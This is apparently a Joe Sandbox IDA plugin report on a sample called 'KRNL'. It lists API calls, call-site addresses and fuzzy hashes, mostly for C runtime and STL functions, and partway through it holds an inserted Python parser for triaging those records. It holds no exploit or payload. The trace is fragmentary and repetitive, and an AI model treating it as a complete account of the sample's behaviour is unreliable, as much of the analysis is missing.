Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: DecrefRef_count_base::_std::_
• String ID: MOC$RCC$csm
• API String ID: 1456557076-2671469338
• Opcode ID: b6c5d81c810cc1274d6920e846810f5cf096aca96933b96eae19ce6a35613a7c
• Instruction ID: 80d1008a47589e5fec60db716430fb67a448bf0da8ac3d053a67c16db8a92f1a
• Opcode Fuzzy Hash: b6c5d81c810cc1274d6920e846810f5cf096aca96933b96eae19ce6a35613a7c
• Instruction Fuzzy Hash: 1241CE34902388DFCF28DF6AD945AAFB7B6BF44300B68906DE045A7742C734AA05CF55
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AB1687B8,?,?,00000000,0070BE94,000000FF,?,006F5685,00000002,?,006F5721,006F8396), ref: 006F55F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F560B
• FreeLibrary.KERNEL32(00000000,?,?,00000000,0070BE94,000000FF,?,006F5685,00000002,?,006F5721,006F8396), ref: 006F562D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: c2082092b1bb25e83b11f16d5ceef1813ba1fc995de19d4cc7a234b6cbf34af1
• Instruction ID: 3bab834c2e031fdaa1c95afc75f8726b03673c70e9459ab87e9cfc4dc0d0f2c0
• Opcode Fuzzy Hash: c2082092b1bb25e83b11f16d5ceef1813ba1fc995de19d4cc7a234b6cbf34af1
• Instruction Fuzzy Hash: 3E016771540A19EFDB118F58DC09BEEBBB9FB04B15F018525F921E22E0DB789D00CA94
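The function records in this part of the report all follow the same layout (an "APIs" list with `ref:` call-site addresses, a "Memory Dump Source" block whose `Offset:` is the image base, and a "Similarity" block with "$"-joined strings and fuzzy hashes). The parser below is an added example, not Joe Sandbox code: it turns that text into structured records, converts call sites to image-relative offsets, and applies a triage heuristic of my own (an assumption, not a report field) that labels functions whose direct calls all resolve to LIBCMT/LIBVCRUNTIME/LIBCPMT, or that probe `mscoree.dll` for `CorExitProcess`, as compiler runtime rather than the sample's own logic. The embedded input is a constructed, shortened retyping of the CorExitProcess record above and the `__alloca_probe_16` record that follows it.

```python
"""Added example (not Joe Sandbox code): parse the per-function records above
into structured data so CRT boilerplate can be filtered out of a triage list."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: two records from this section, retyped with shortened
# argument lists; headings and bullets follow the report layout exactly.
SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AB1687B8), ref: 006F55F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F560B
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006F562D
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Instruction Fuzzy Hash: 3E016771540A19EFDB118F58DC09BEEBBB9FB04B15F018525F921E22E0DB789D00CA94
APIs
• __alloca_probe_16.LIBCMT ref: 006FD76F
• __freea.LIBCMT ref: 006FD89F
  • Part of subcall function 006FBF11: RtlAllocateHeap.NTDLL(00000000,006FDF35,?,00000220), ref: 006FBF43
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Similarity
• String ID:
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
CRT_MODULES = {"LIBCMT", "LIBVCRUNTIME", "LIBCPMT"}  # static CRT / STL library code
# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function PARENT:" for nested calls.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                      # virtual address of the call site
    parent: Optional[int] = None  # set for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    image_base: Optional[int] = None  # "Offset:" of the Source File dump
    fields: dict = field(default_factory=dict)

def parse_records(text: str) -> List[FunctionRecord]:
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:  # each "APIs" heading opens a new record
            section = line
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            continue
        if not line or current is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                parent = int(m["parent"], 16) if m["parent"] else None
                current.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), parent))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", val)
            current.image_base = int(off.group(1), 16) if off else None
        elif key == "String ID":  # the report joins strings with "$"
            current.strings = [s for s in val.split("$") if s]
        else:
            current.fields[key] = val
    return records

def rva(rec: FunctionRecord, call: ApiCall) -> int:
    """Image-relative offset of a call site, stable across different load bases."""
    return call.ref - rec.image_base

def classify(rec: FunctionRecord) -> str:
    """Heuristic triage label (an assumption of this example, not a report field):
    all-CRT direct calls are compiler runtime; the mscoree.dll/CorExitProcess probe
    is the CRT's exit-time check for a loaded CLR."""
    direct = [a for a in rec.apis if a.parent is None]
    names = {a.name for a in direct}
    if {"GetModuleHandleExW", "GetProcAddress"} <= names and "CorExitProcess" in rec.strings:
        return "crt-exit-stub"
    if direct and all(a.module in CRT_MODULES for a in direct):
        return "crt-internal"
    return "sample-code"
```

Running `classify` over every record in a report and keeping only those labelled `sample-code` leaves the functions worth reading in the disassembly; the `rva` values let those call sites be matched against a second run even if the sample is relocated to a different base.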
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006FD76F
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006FD838
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD89F
                                                                                                                                                                                                                                                            • Part of subcall function 006FBF11: RtlAllocateHeap.NTDLL(00000000,006FDF35,?,?,006FDF35,00000220,?,00000000,?), ref: 006FBF43
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD8B2
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD8BF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
• Opcode ID: bb54ce4c3091b957c4e278a84252753b620442c7112fec1d2a3df5ca0bf94daa
• Instruction ID: 2c19cfb39e9bada7a974c9f23f455b40d615caffa5220fc26033e33459bd7f10
• Opcode Fuzzy Hash: bb54ce4c3091b957c4e278a84252753b620442c7112fec1d2a3df5ca0bf94daa
• Instruction Fuzzy Hash: 5351B57260020EAFEB215F65CC81EFF7AABEF44790B15012CFE14D6251EB71EC1196A4
APIs
• GetCurrentThreadId.KERNEL32 ref: 006EF005
• AcquireSRWLockExclusive.KERNEL32(006E8E38), ref: 006EF024
• AcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF052
• TryAcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF0AD
• TryAcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF0C4
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: AcquireExclusiveLock$CurrentThread
• String ID:
• API String ID: 66001078-0
• Opcode ID: 3c69e2b5fc7cb5f103d12c6b8410b1aaa5a8b962232d7514bdf93b1040595f4f
• Instruction ID: 3d59a0fc825efad6828327974411dec3a529b87ea031430514ec7b8493255d30
• Opcode Fuzzy Hash: 3c69e2b5fc7cb5f103d12c6b8410b1aaa5a8b962232d7514bdf93b1040595f4f
• Instruction Fuzzy Hash: F0416D3160278ADBCB20CF66C4919EAB3B6FF04310B10897AE44687641E770F985CB55
APIs
• __EH_prolog3.LIBCMT ref: 006ED4C9
• std::_Lockit::_Lockit.LIBCPMT ref: 006ED4D3
• int.LIBCPMT ref: 006ED4EA
  • Part of subcall function 006EC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 006EC1F6
  • Part of subcall function 006EC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 006EC210
• codecvt.LIBCPMT ref: 006ED50D
• std::_Lockit::~_Lockit.LIBCPMT ref: 006ED544
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
• Opcode ID: efb3d3b4c44e2fdb652f793045497e22f6264bb669f01c4efb36290e2c90b34f
• Instruction ID: b4d0c4642763be2541857f7fb966bd011c441fa72e0ed29835dea9242395db61
• Opcode Fuzzy Hash: efb3d3b4c44e2fdb652f793045497e22f6264bb669f01c4efb36290e2c90b34f
• Instruction Fuzzy Hash: 7A01A1319023959FCB02EBA98945AFD7773AF84724F14411DE415AB3C2DF349E018785
APIs
• __EH_prolog3.LIBCMT ref: 006EADDE
• std::_Lockit::_Lockit.LIBCPMT ref: 006EADE9
• std::_Lockit::~_Lockit.LIBCPMT ref: 006EAE57
  • Part of subcall function 006EACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006EACC2
• std::locale::_Setgloballocale.LIBCPMT ref: 006EAE04
• _Yarn.LIBCPMT ref: 006EAE1A
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
• Opcode ID: b8659ef3c6f157f55fbd69b1e35f7ebce03cd11ea150a065e63acb30f1ebe2a5
• Instruction ID: bea54adbb77d3ef6881b3b8552a59e70f5b5c58c962d983dcecec3a1bc0db0df
• Opcode Fuzzy Hash: b8659ef3c6f157f55fbd69b1e35f7ebce03cd11ea150a065e63acb30f1ebe2a5
• Instruction Fuzzy Hash: 6B01B1756023909BCB06EFA5D8555BD3762FF84750B15802DE9065B3C1CF78BE42CB8A
APIs
  • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
  • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,006F5BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00700A35
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,006F5BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00700A6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                          • String ID: ,Kq$utf8
                                                                                                                                                                                                                                                          • API String ID: 943130320-1836333774
                                                                                                                                                                                                                                                          • Opcode ID: bc3e0e0c270f296bffe0e1446ce1f6b543816833ca692cc9a935f245fec58890
                                                                                                                                                                                                                                                          • Instruction ID: c37cdb41688daf3ab7a874337e7a83621760015f6da798e0f364c14415c5dad7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3e0e0c270f296bffe0e1446ce1f6b543816833ca692cc9a935f245fec58890
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B5106B5704305EADB24AB34CC46FB673E8EF05724F144629F549971C2EA7CE98087E5
APIs
• Concurrency::details::_Release_chore.LIBCPMT ref: 006E7526
• ___std_exception_copy.LIBVCRUNTIME ref: 006E7561
  • Part of subcall function 006EAF37: CreateThreadpoolWork.KERNEL32(006EB060,006E8A2A,00000000), ref: 006EAF46
  • Part of subcall function 006EAF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 006EAF53
Strings
Similarity
• API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
• String ID: Fail to schedule the chore!$G.q
• API String ID: 3683891980-4289182727
• Opcode ID: 1820e38347da644820f71d54fe1c2df4c89fb2003db227e515c47da4987f1df4
• Instruction ID: c5c31b02e7e76ad7c242f9661e7fc1727bc66479e59dddb65c88342f62da0b48
• Opcode Fuzzy Hash: 1820e38347da644820f71d54fe1c2df4c89fb2003db227e515c47da4987f1df4
• Instruction Fuzzy Hash: 07517BB0902348DFCB05DF94D844BAEBBB6FF48314F144129E8196B391E779AA05CB95
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 006E3EC6
• std::_Lockit::~_Lockit.LIBCPMT ref: 006E4002
  • Part of subcall function 006EABC5: _Yarn.LIBCPMT ref: 006EABE5
  • Part of subcall function 006EABC5: _Yarn.LIBCPMT ref: 006EAC09
Strings
Similarity
• API ID: LockitYarnstd::_$Lockit::_Lockit::~_
• String ID: bad locale name$|=ne.q
• API String ID: 2070049627-3641304814
• Opcode ID: 224fc745ae706d962f2b4e98e40500617b091a4b1d10f48a664cae545d654513
• Instruction ID: c8b075d3f7149adb5063850cb13611cc796dba9b14e580510db145941b615297
• Opcode Fuzzy Hash: 224fc745ae706d962f2b4e98e40500617b091a4b1d10f48a664cae545d654513
• Instruction Fuzzy Hash: 77418EF0A007559BEB10DF6AC809B57BAF9BF04714F04422CE4099B781E37AE618CBE5
APIs
• std::_Ref_count_base::_Decref.LIBCPMT ref: 006EB809
Strings
Similarity
• API ID: DecrefRef_count_base::_std::_
• String ID: MOC$RCC$csm
• API String ID: 1456557076-2671469338
• Opcode ID: ad9d5c75d85a87d20b9d4d70ea688022673c6ffc9ec02439ccd613887632bd88
• Instruction ID: ca7a1570d745cd85b90d7508e7b0b1753db69ce7919babec99c5d67558c50083
• Opcode Fuzzy Hash: ad9d5c75d85a87d20b9d4d70ea688022673c6ffc9ec02439ccd613887632bd88
• Instruction Fuzzy Hash: 20210331902389DFCF249F56D941ABBB7AEEF54720F24551DE4018BB80DB34AA41CB80
APIs
• WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
• GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
• CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                          • String ID: :%n
                                                                                                                                                                                                                                                          • API String ID: 2551024706-2487494124
                                                                                                                                                                                                                                                          • Opcode ID: cf6b89112603431ae6929f9869fd0010ed2fd97ab9a18872b06b329990857236
                                                                                                                                                                                                                                                          • Instruction ID: c27027fd2ae53da7c7fcefa87e2fbe1e7739d6b61703c9a9c0f39f4465083014
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf6b89112603431ae6929f9869fd0010ed2fd97ab9a18872b06b329990857236
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F08271655218EFDF108F29DC05ADA3B65EB01B70F248320F821EA2E0E730EE41C690
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Yarn
                                                                                                                                                                                                                                                          • String ID: e.q$|=ne.q
                                                                                                                                                                                                                                                          • API String ID: 1767336200-1506673154
                                                                                                                                                                                                                                                          • Opcode ID: 44f7624037389ae8866c6fd5a4c7047b91fbb02b753d0d7c8d4e28b539063395
                                                                                                                                                                                                                                                          • Instruction ID: 5652a72172c1655732cdbc06ad4945204099ef7c9978b85cbf39467072c7808a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44f7624037389ae8866c6fd5a4c7047b91fbb02b753d0d7c8d4e28b539063395
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E065323087046FE74C7A6AAC52BB637DDDF04B60F20002DFA1A865C1ED10BC444569
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,007069DC,00000000,?,0071D2B0,?,?,?,00706913,00000004,InitializeCriticalSectionEx,00710D34,00710D3C), ref: 0070694D
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,007069DC,00000000,?,0071D2B0,?,?,?,00706913,00000004,InitializeCriticalSectionEx,00710D34,00710D3C,00000000,?,006FBBBC), ref: 00706957
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0070697F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                          • Opcode ID: cf1b97fed0619971c168c961d5243a05fb2cad014dbe3e0cf20c42ab6d781e4d
                                                                                                                                                                                                                                                          • Instruction ID: 220de2021965a021cd5d3ea174db668cff5f310e282c1e19eeb8475691912a76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1b97fed0619971c168c961d5243a05fb2cad014dbe3e0cf20c42ab6d781e4d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE01270390204FADF101FA4EC06FAC3A959B40B91F148564F94CA88E0D779ED609984
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(AB1687B8,00000000,00000000,?), ref: 00704001
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00704253
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00704299
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0070433C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                                          • Opcode ID: 4abc43949758727193f159d1e01ee19cd4f9fb3766aba155f10c7fa64e59a81c
                                                                                                                                                                                                                                                          • Instruction ID: 63b9e8cb4f49cefcc034a0c9f177bb6423c7d55d8751590667e79805d36a2608
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4abc43949758727193f159d1e01ee19cd4f9fb3766aba155f10c7fa64e59a81c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2D149B5E00258DFCF15CFA8C880AEDBBF5FF49314F14826AEA55EB291D634A941CB50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
APIs
• GetCurrentThreadId.KERNEL32 ref: 006E72C5
• std::_Throw_Cpp_error.LIBCPMT ref: 006E7395
• std::_Throw_Cpp_error.LIBCPMT ref: 006E73A3
• std::_Throw_Cpp_error.LIBCPMT ref: 006E73B1
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 006E4495
• std::_Lockit::_Lockit.LIBCPMT ref: 006E44B2
• std::_Lockit::~_Lockit.LIBCPMT ref: 006E44D3
• std::_Lockit::~_Lockit.LIBCPMT ref: 006E4580
APIs
  • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
• GetLastError.KERNEL32 ref: 00701E2A
• __dosmaperr.LIBCMT ref: 00701E31
• GetLastError.KERNEL32 ref: 00701E6B
• __dosmaperr.LIBCMT ref: 00701E72
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 007031C6
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007031FE
